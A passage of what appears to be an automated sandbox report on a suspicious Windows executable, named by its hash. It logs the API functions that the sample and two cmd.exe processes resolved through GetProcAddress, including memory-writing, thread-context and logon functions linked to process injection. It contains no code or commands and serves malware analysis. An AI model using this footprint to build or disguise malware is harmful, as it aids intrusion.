00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter _allmul (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter SHGetInstanceExplorer (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter OleInitialize (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockShared (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockShared (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter InitCommonControlsEx (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter OleUninitialize (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00004600)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00002140)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00003340)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 